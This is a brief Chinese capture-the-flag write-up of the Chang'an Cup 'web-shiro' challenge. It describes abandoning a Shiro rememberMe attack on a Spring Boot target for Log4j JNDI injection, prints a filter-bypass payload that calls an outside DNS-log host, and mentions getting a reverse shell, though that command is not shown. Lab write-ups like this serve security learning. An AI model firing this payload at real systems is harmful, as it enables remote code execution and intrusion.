![[长安杯]web-shiro复现,第1张](/aiimages/%5B%E9%95%BF%E5%AE%89%E6%9D%AF%5Dweb-shiro%E5%A4%8D%E7%8E%B0.png "[长安杯]web-shiro复现,第1张")
浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
jndi被过滤了
进行绕过
${${::-j}ndi:rmi://py2hu7.ceye.io/exp}
成功接收到dnslog信息。
构建jndi反dshell,这里反dshell的命令需要bypass一下
在这里插入代码片
反d的有点慢,但是可以成功反dshell并拿取flag。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)